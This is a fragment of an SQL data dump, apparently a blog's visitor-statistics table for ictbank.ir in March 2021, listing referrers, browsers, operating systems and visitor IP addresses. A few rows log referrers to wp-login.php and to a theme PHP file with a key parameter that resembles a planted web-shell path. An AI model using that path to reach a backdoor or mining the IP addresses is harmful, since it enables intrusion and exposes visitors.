(9656,'2021-03-06','https://www.google.com/','Firefox','Windows','10.0',NULL,NULL,'','87.12.250.131','000',0,1,0),
(9657,'2021-03-06','http://ictbank.ir/blog','Internet Explorer','Windows','6.0',NULL,NULL,'','45.12.220.196','000',0,2,0),
(9658,'2021-03-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.196.7.193','000',0,1,0),
(9659,'2021-03-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.217.204','000',0,1,0),
(9660,'2021-03-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(9661,'2021-03-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(9662,'2021-03-06','http://ictbank.ir/blog','Facebook','Android','6.0.1',NULL,NULL,'','185.191.207.52','000',0,2,0),
(9663,'2021-03-06','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','171.36.135.179','000',0,1,0),
(9664,'2021-03-06','http://ictbank.ir/blog','UC Browser','Android','4.1.1',NULL,NULL,'','37.120.211.116','000',0,2,0),
(9665,'2021-03-06','http://ictbank.ir','Chrome','OS X','10.14.4',NULL,NULL,'','51.158.108.94','000',0,1,0),
(9666,'2021-03-06','http://ictbank.ir/blog','UC Browser','Android','4.4.2',NULL,NULL,'','89.40.183.13','000',0,2,0),
(9667,'2021-03-07','http://ictbank.ir/blog','Chrome','OS X','10.15.4',NULL,NULL,'','63.32.90.86','000',0,1,0),
(9668,'2021-03-07','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','217.138.222.204','000',0,2,0),
(9669,'2021-03-07','http://ictbank.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','113.189.150.223','000',0,2,0),
(9670,'2021-03-07','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','37.120.203.196','000',0,2,0),
(9671,'2021-03-07','http://ictbank.ir/blog','Opera','Windows','5.1',NULL,NULL,'','152.89.163.164','000',0,2,0),
(9672,'2021-03-07','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.225','000',0,3,0),
(9673,'2021-03-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.36.116.161','000',0,2,0),
(9674,'2021-03-07','http://ictbank.ir/blog','UC Browser','Android','4.1.1',NULL,NULL,'','194.35.233.242','000',0,2,0),
(9675,'2021-03-07','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','170.83.179.60','000',0,2,0),
(9676,'2021-03-07','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','91.108.29.108','000',0,1,0),
(9677,'2021-03-07','http://ictbank.ir/blog','Chrome','Android','5.1',NULL,NULL,'','185.230.127.28','000',0,2,0),
(9678,'2021-03-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.202.167.42','000',0,1,0),
(9679,'2021-03-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(9680,'2021-03-07','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','82.31.85.72','000',0,1,0),
(9681,'2021-03-07','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.138.184.25','000',0,1,0),
(9682,'2021-03-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.180.62.151','000',0,2,0),
(9683,'2021-03-07','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','118.89.65.15','000',0,2,0),
(9684,'2021-03-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(9685,'2021-03-07','http://ictbank.ir/blog','UC Browser','Android','5.1.1',NULL,NULL,'','217.138.192.52','000',0,2,0),
(9686,'2021-03-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.61.206','000',0,1,0),
(9687,'2021-03-07','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(9688,'2021-03-07','http://ictbank.ir/blog','UC Browser','Android','7.0',NULL,NULL,'','196.240.57.196','000',0,2,0),
(9689,'2021-03-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(9690,'2021-03-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,2,0),
(9691,'2021-03-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(9692,'2021-03-07','http://ictbank.ir/blog','Yandex Browser','Windows','6.1',NULL,NULL,'','141.98.103.132','000',0,2,0),
(9693,'2021-03-07','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','5.253.206.140','000',0,2,0),
(9694,'2021-03-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.92.175','000',0,1,0),
(9695,'2021-03-07','http://ictbank.ir/blog/','Chrome','Windows','6.3',NULL,NULL,'','91.79.25.49','000',0,4,0),
(9696,'2021-03-07','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','206.125.156.2','000',0,1,0),
(9697,'2021-03-07','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','37.120.156.220','000',0,2,0),
(9698,'2021-03-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,3,0),
(9699,'2021-03-08','http://ictbank.ir/blog','UC Browser','Android','Unknown',NULL,NULL,'','86.106.103.7','000',0,2,0),
(9700,'2021-03-08','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.225','000',0,6,0),
(9701,'2021-03-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','165.227.50.230','000',0,1,0),
(9702,'2021-03-08','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Chrome','Windows','10.0',NULL,NULL,'','78.108.38.156','000',0,2,0),
(9703,'2021-03-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(9704,'2021-03-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','52.64.20.252','000',0,5,0),
(9705,'2021-03-08','http://ictbank.ir/blog','Unknown','Android','9',NULL,NULL,'','89.34.98.99','000',0,2,0),
(9706,'2021-03-08','http://ictbank.ir/blog','Chrome','Android','6.0.1',NULL,NULL,'','185.134.23.120','000',0,2,0),
(9707,'2021-03-08','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(9708,'2021-03-08','http://ictbank.ir/blog','Facebook','Android','7.0',NULL,NULL,'','185.230.127.28','000',0,2,0),
(9709,'2021-03-08','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','46.101.80.192','000',0,1,0),
(9710,'2021-03-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.24.91.114','000',0,1,0),
(9711,'2021-03-08','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','89.158.96.88','000',0,1,0),
(9712,'2021-03-08','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','5.188.62.214','000',0,2,0),
(9713,'2021-03-08','http://ictbank.ir/blog','Facebook','iOS','12.3.2',NULL,NULL,'','37.120.141.20','000',0,2,0),
(9714,'2021-03-08','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','45.158.15.36','000',0,2,0),
(9715,'2021-03-08','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','185.236.42.87','000',0,2,0),
(9716,'2021-03-08','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','13.209.28.104','000',0,5,0),
(9717,'2021-03-08','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','148.63.156.217','000',0,1,0),
(9718,'2021-03-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.160.89.175','000',0,1,0),
(9719,'2021-03-08','http://ictbank.ir/blog','Chrome','Android','7.1',NULL,NULL,'','217.146.82.102','000',0,2,0),
(9720,'2021-03-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','195.206.170.4','000',0,2,0),
(9721,'2021-03-08','http://ictbank.ir/blog','Safari','iOS','14.4',NULL,NULL,'','31.53.22.103','000',0,1,0),
(9722,'2021-03-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(9723,'2021-03-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.93.235','000',0,1,0),
(9724,'2021-03-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.122.108.28','000',0,1,0),
(9725,'2021-03-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(9726,'2021-03-08','http://ictbank.ir/blog','Chrome','Android','4.2.2',NULL,NULL,'','109.102.111.61','000',0,3,0),
(9727,'2021-03-08','http://ictbank.ir/blog','UC Browser','Android','5.1',NULL,NULL,'','5.180.62.151','000',0,2,0),
(9728,'2021-03-08','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.220.70.221','000',0,2,0),
(9729,'2021-03-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.252.147.78','000',0,1,0),
(9730,'2021-03-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(9731,'2021-03-09','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,3,0),
(9732,'2021-03-09','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','165.231.130.119','000',0,21,0),
(9733,'2021-03-09','http://82.102.9.14/blog/wp-content/themes/chigue/wp_class_datalib.php?z=F5d4JH6m1','Internet Explorer','Windows','5.1',NULL,NULL,'','191.92.153.194','000',0,1,0),
(9734,'2021-03-09','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','68.183.205.7','000',0,1,0),
(9735,'2021-03-09','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','93.138.172.184','000',0,2,0),
(9736,'2021-03-09','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.225','000',0,3,0),
(9737,'2021-03-09','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','104.227.254.185','000',0,2,0),
(9738,'2021-03-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.115.103','000',0,1,0),
(9739,'2021-03-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','95.211.127.209','000',0,1,0),
(9740,'2021-03-09','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','103.146.100.70','000',0,2,0),
(9741,'2021-03-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(9742,'2021-03-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','13.59.131.212','000',0,3,0),
(9743,'2021-03-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.213.253','000',0,1,0),
(9744,'2021-03-09','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.125.35','000',0,1,0),
(9745,'2021-03-09','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','110.177.177.165','000',0,1,0),
(9746,'2021-03-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.95.45','000',0,1,0),
(9747,'2021-03-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(9748,'2021-03-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(9749,'2021-03-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.169.222','000',0,1,0),
(9750,'2021-03-09','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','110.167.215.144','000',0,1,0),
(9751,'2021-03-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(9752,'2021-03-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.154.26','000',0,2,0),
(9753,'2021-03-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.88.84.55','000',0,1,0),
(9754,'2021-03-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.146','000',0,1,0),
(9755,'2021-03-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.252.147.78','000',0,1,0),
(9756,'2021-03-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(9757,'2021-03-10','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.225','000',0,6,0),
(9758,'2021-03-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(9759,'2021-03-10','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','116.72.15.109','000',0,2,0),
(9760,'2021-03-10','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','112.186.112.112','000',0,1,0),
(9761,'2021-03-10','http://82.102.9.14:80/blog','Chrome','Windows','6.1',NULL,NULL,'','176.122.22.31','000',0,2,0),
(9762,'2021-03-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.115.149','000',0,1,0),
(9763,'2021-03-10','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.100','000',0,1,0),
(9764,'2021-03-10','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','41.158.42.56','000',0,1,0),
(9765,'2021-03-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.151.220','000',0,1,0),
(9766,'2021-03-10','http://ictbank.ir/blog','Chrome','OS X','10.12.3',NULL,NULL,'','187.45.116.162','000',0,1,0),
(9767,'2021-03-10','https://duckduckgo.com/','Safari','OS X','10.15.6',NULL,NULL,'','109.173.26.244','000',0,1,0),
(9768,'2021-03-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.214','000',0,1,0),
(9769,'2021-03-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.11.114','000',0,1,0),
(9770,'2021-03-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.151.119','000',0,1,0),
(9771,'2021-03-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.169.222','000',0,1,0),
(9772,'2021-03-11','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.100','000',0,1,0),
(9773,'2021-03-11','http://design-arena.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','20.36.29.222','000',0,3,0),
(9774,'2021-03-11','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(9775,'2021-03-11','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','198.71.55.250','000',0,1,0),
(9776,'2021-03-11','http://ictbank.ir/blog','Chrome','Windows','5.2',NULL,NULL,'','106.45.10.120','000',0,1,0),
(9777,'2021-03-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','45.33.102.90','000',0,1,0),
(9778,'2021-03-11','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','198.20.87.98','000',0,1,0),
(9779,'2021-03-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','72.167.190.208','000',0,1,0),
(9780,'2021-03-11','http://ictbank.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','78.95.184.187','000',0,2,0),
(9781,'2021-03-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.13.103','000',0,1,0),
(9782,'2021-03-11','http://ictbank.ir/blog/','Chrome','Windows','6.1',NULL,NULL,'','91.76.189.120','000',0,1,0),
(9783,'2021-03-11','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.136.78','000',0,1,0),
(9784,'2021-03-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.196.160','000',0,2,0),
(9785,'2021-03-11','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','139.162.208.7','000',0,1,0),
(9786,'2021-03-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.209.40.34','000',0,1,0),
(9787,'2021-03-11','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.225','000',0,3,0),
(9788,'2021-03-11','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','91.172.186.112','000',0,1,0),
(9789,'2021-03-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.122.108.28','000',0,1,0),
(9790,'2021-03-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.214','000',0,1,0),
(9791,'2021-03-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(9792,'2021-03-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(9793,'2021-03-11','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.163.109.66','000',0,1,0),
(9794,'2021-03-11','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','45.79.160.215','000',0,1,0),
(9795,'2021-03-11','https://duckduckgo.com/','Firefox','Ubuntu','Unknown',NULL,NULL,'','24.146.173.247','000',0,2,0),
(9796,'2021-03-12','http://ictbank.ir/blog','Edge','Windows','10.0',NULL,NULL,'','151.55.40.76','000',0,2,0),
(9797,'2021-03-12','http://ictbank.ir/blog','Unknown','iOS','13.2.2',NULL,NULL,'','50.31.21.9','000',0,1,0),
(9798,'2021-03-12','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','116.203.118.216','000',0,1,0),
(9799,'2021-03-12','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(9800,'2021-03-12','https://www.google.ru/','Edge','Windows','10.0',NULL,NULL,'','178.47.1.87','000',0,1,0),
(9801,'2021-03-12','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','106.45.11.70','000',0,1,0),
(9802,'2021-03-12','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.225','000',0,3,0),
(9803,'2021-03-12','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','35.232.196.198','000',0,2,0),
(9804,'2021-03-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.185.210.174','000',0,1,0),
(9805,'2021-03-12','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','119.45.208.164','000',0,3,0),
(9806,'2021-03-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.185.5.229','000',0,1,0),
(9807,'2021-03-12','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','64.227.112.120','000',0,1,0),
(9808,'2021-03-12','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','88.241.72.246','000',0,2,0),
(9809,'2021-03-12','http://82.102.9.14/blog','Firefox','OS X','10.15',NULL,NULL,'','54.229.24.59','000',0,1,0),
(9810,'2021-03-12','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.237.70.204','000',0,1,0),
(9811,'2021-03-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.128.254.37','000',0,1,0),
(9812,'2021-03-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.217.204','000',0,1,0),
(9813,'2021-03-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.122.108.28','000',0,1,0),
(9814,'2021-03-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(9815,'2021-03-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(9816,'2021-03-13','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','70.109.56.92','000',0,1,0),
(9817,'2021-03-13','https://www.google.com/','Chrome','iOS','14.4',NULL,NULL,'','173.32.88.154','000',0,1,0),
(9818,'2021-03-13','http://82.102.9.14/blog/wp-content/themes/chigue/wp_class_datalib.php?z=F5d4JH6m1','Internet Explorer','Windows','5.1',NULL,NULL,'','39.111.4.96','000',0,1,0),
(9819,'2021-03-13','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','207.154.255.215','000',0,1,0),
(9820,'2021-03-13','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.225','000',0,6,0),
(9821,'2021-03-13','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.219.56.8','000',0,1,0),
(9822,'2021-03-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(9823,'2021-03-13','http://82.102.9.14/blog','Firefox','Windows','10.0',NULL,NULL,'','35.230.56.66','000',0,1,0),
(9824,'2021-03-13','http://ictbank.ir/blog','Opera','Windows','6.0',NULL,NULL,'','91.205.160.96','000',0,2,0),
(9825,'2021-03-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.75.70','000',0,1,0),
(9826,'2021-03-13','http://ictbank.ir/blog','Chrome','Windows','4.0',NULL,NULL,'','3.0.115.255','000',0,6,0),
(9827,'2021-03-13','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','192.99.18.108','000',0,1,0),
(9828,'2021-03-13','ictbank.ir','Chrome','Windows','6.1',NULL,NULL,'','104.219.169.100','000',0,5,0),
(9829,'2021-03-13','ictbank.ir','Chrome','Windows','6.1',NULL,NULL,'','67.207.82.252','000',0,4,0),
(9830,'2021-03-13','ictbank.ir','Chrome','Windows','6.1',NULL,NULL,'','162.243.31.102','000',0,4,0),
(9831,'2021-03-13','ictbank.ir','Chrome','Windows','6.1',NULL,NULL,'','88.198.91.76','000',0,4,0),
(9832,'2021-03-13','ictbank.ir','Chrome','Windows','6.1',NULL,NULL,'','46.101.127.133','000',0,3,0),
(9833,'2021-03-13','ictbank.ir','Chrome','Windows','6.1',NULL,NULL,'','159.89.195.6','000',0,5,0),
(9834,'2021-03-13','ictbank.ir','Chrome','Windows','6.1',NULL,NULL,'','206.189.156.51','000',0,5,0),
(9835,'2021-03-13','ictbank.ir','Chrome','Windows','6.1',NULL,NULL,'','159.65.37.186','000',0,5,0),
(9836,'2021-03-13','ictbank.ir','Chrome','Windows','6.1',NULL,NULL,'','77.81.234.136','000',0,1,0),
(9837,'2021-03-13','ictbank.ir','Chrome','Windows','6.1',NULL,NULL,'','34.211.180.47','000',0,3,0),
(9838,'2021-03-13','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','192.99.18.122','000',0,1,0),
(9839,'2021-03-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.15.64.216','000',0,1,0),
(9840,'2021-03-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.13.13.224','000',0,1,0),
(9841,'2021-03-13','https://duckduckgo.com/','Firefox','Fedora','Unknown',NULL,NULL,'','198.255.234.26','000',0,1,0),
(9842,'2021-03-13','http://ictbank.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','177.23.151.242','000',0,1,0),
(9843,'2021-03-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(9844,'2021-03-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(9845,'2021-03-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.151.119','000',0,1,0),
(9846,'2021-03-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(9847,'2021-03-13','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','117.14.154.67','000',0,1,0),
(9848,'2021-03-13','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','68.109.112.140','000',0,2,0),
(9849,'2021-03-14','http://ictbank.ir/blog','Chrome','OS X','10.15.4',NULL,NULL,'','52.211.178.68','000',0,1,0),
(9850,'2021-03-14','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','34.222.40.115','000',0,1,0),
(9851,'2021-03-14','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','52.34.114.117','000',0,1,0),
(9852,'2021-03-14','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(9853,'2021-03-14','www.google.com','Unknown','Android','7.0',NULL,NULL,'','31.210.20.22','000',0,1,0),
(9854,'2021-03-14','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','34.241.77.13','000',0,6,0),
(9855,'2021-03-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.149.138.118','000',0,1,0),
(9856,'2021-03-14','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.236.232.95','000',0,1,0),
(9857,'2021-03-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.62.177.122','000',0,2,0),
(9858,'2021-03-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.149.39','000',0,1,0),
(9859,'2021-03-14','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','124.227.31.67','000',0,1,0),
(9860,'2021-03-14','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.225','000',0,3,0),
(9861,'2021-03-14','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.142.236.35','000',0,1,0),
(9862,'2021-03-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(9863,'2021-03-14','http://ictbank.ir/blog','Unknown','Android','7.0',NULL,NULL,'','192.71.23.211','000',0,1,0),
(9864,'2021-03-14','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','111.231.132.135','000',0,3,0),
(9865,'2021-03-14','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','212.48.71.250','000',0,3,0),
(9866,'2021-03-14','http://ictbank.ir','Chrome','OS X','10.15.3',NULL,NULL,'','157.90.174.228','000',0,1,0),
(9867,'2021-03-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(9868,'2021-03-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(9869,'2021-03-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.151.119','000',0,1,0),
(9870,'2021-03-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(9871,'2021-03-14','http://ictbank.ir/blog','Opera','Windows','6.0',NULL,NULL,'','91.205.160.96','000',0,2,0),
(9872,'2021-03-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','188.225.37.46','000',0,3,0),
(9873,'2021-03-15','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','165.231.130.119','000',0,28,0),
(9874,'2021-03-15','https://duckduckgo.com/','Firefox','Fedora','Unknown',NULL,NULL,'','198.255.234.26','000',0,1,0),
(9875,'2021-03-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(9876,'2021-03-15','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','123.189.88.206','000',0,1,0),
(9877,'2021-03-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.202.30.131','000',0,1,0),
(9878,'2021-03-15','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','162.251.172.181','000',0,1,0),
(9879,'2021-03-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.73.14.38','000',0,6,0),
(9880,'2021-03-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.149.76.46','000',0,1,0),
(9881,'2021-03-15','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.157','000',0,3,0),
(9882,'2021-03-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.255.133.51','000',0,1,0),
